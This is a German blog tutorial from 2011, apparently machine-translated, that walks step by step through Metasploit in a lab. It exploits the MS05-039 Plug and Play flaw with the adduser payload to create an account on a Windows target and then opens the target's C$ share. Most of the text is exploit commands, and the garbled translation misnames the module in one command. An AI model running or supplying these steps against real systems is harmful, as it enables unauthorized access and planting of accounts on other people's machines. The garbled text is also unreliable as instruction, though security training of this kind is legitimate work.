Sonntag, 23. Januar 2011

Metasploit

Demonstriert wird dies in meinem Security-Labor
Der Angreifer Computer ist 192.168.1.9 (Linux Backtrack 4) 
Der Ziel-Rechner wird 192.168.1.10

den ersten Befehl, der in die Shell eingegeben wird, ist 
zeige Exploits

** show exploits

Dieser Befehl zeigt alle Exploits, die vom Angreifer verwendet werden können. 

 In diesem Fall wird der Angreifer das 

ms05_039_pnp   Exploit auszunutzen.

Der Befehl zum Einsatz des Exploit 
** use ms_035_pnp

Drücken Sie ENTER und das Exploit wird verwendet. 

Nun werden wir sehen, was das Exploit kann. 

das Exploit wird nun Fragen

tragenSie diesen Befehl ein 
** show payloads 

Drücken Sie auf ENTER und alle

payloads werden dem Angreifer gezeigt werden. 

In diesem Fall wird der Angreifer , einen neuen Benutzer an den Slave-Computer hinzufügen. 

Der Befehl, dafür, ist 
** set payload windows/adduser 

Drücken Sie auf ENTER und das payload wird verwendet werden. 

Das nächste, was der Angreifer tun muss, ist das Ziel vorgegeben.

Der Angreifer muss nun mit diesem Befehl die Zielliste anzeigen lassen.
** show targets

Nachdem der Angreifer hat das Ziel bestimmen, ist die nächste Sache, um das Ziel gesetzt.

Der Befehl, der benutzt werden kann, ist
das Ziel setzen, mit 0 

** set target 0

Die Nummer wird dem Slave Betriebssystem zugeordnet. 

Die nächsten Schritte werden zeigen, dass die Felder zu füllen durch den Angreifer.

Der nächste Befehl  soll die Optionen anzeigen.

** show options 

Es werden leere Felder sein , die vom Angreifer gefüllt werden müssen.

In diesem Fall sind die leeren Felder RHOST und PASS. 

RHOST steht für Remote Host (Slave-IP-Adresse).
PASS steht für Password. 

für beides, sind die Befehle 
** set RHOST 192.168.1.10
** set PASS 12345

Der Angreifer setzt damit den Remote-Host. 
Der Angreifer setzt auch das Passwort. 

Schließlich ist der letzte Befehl, der verwendet werden muss 
um das Exploit zu nutzen.

** exploit 

Der Exploit-Befehl das Metasploit aufrufen , um den Angriff auf den Slave zu starten. 

Drücken Sie ENTER und Metasploit startet den Angriff.

Nun weiss der Angreifer, dass er ein Konto bei der Slave-Maschine hat. 

Konto-Informationen:
username = Metasploit
password = 12345

Nun ist es Zeit für den Angreifer, die Slave Maschine zu benutzen . 

Der Angreifer öffnet sich ein Dialogfenster Ausführen.

Im Feld "Ausführen", wird das Ziel  eingegeben 
** \\192.168.1.10\c$

ENTER drücken und einen Login-Prompt erscheint.

Angreifer muss den Benutzernamen und das Passwort für die Slave-Maschine eingeben. 

In diesem Fall sind Benutzername und Passwort Metasploit und 12345.

Drücken Sie ENTER, und der Angreifer ist in der Slave-Maschine

The above picture shows that the attacker is in the C drive of slave machine.

What can a slave see on his machine?

If the slave launch a Command Prompt and type in
** net user

The result will be

Das obige Bild zeigt, dass den Angreifer im  C-Laufwerk der  Slave Maschine ist. 

Was kann ein Sklave auf seiner Maschine zu sehen?

Wenn der Slave startetbekommen Sie eine Eingabeaufforderung, und geben ein. 
** net user

Das Ergebnis wird

Siehst du das?

Der Benutzername "Metasploit" ist da.

Das ist der Benutzername, dass der Angreifer erstellt.

Die Befehle, die ich benutzt habe:
** show exploits
** use EXPLOITNAME
** show payloads
** set payload PAYLOADNAME
** show targets
** set target TARGETNUMBER
** show options
** set RHOST IPADDRESS
** exploit




Sign up for PayPal and start accepting credit card payments instantly.


 

©2009 tdoo.sqs...... | by TNB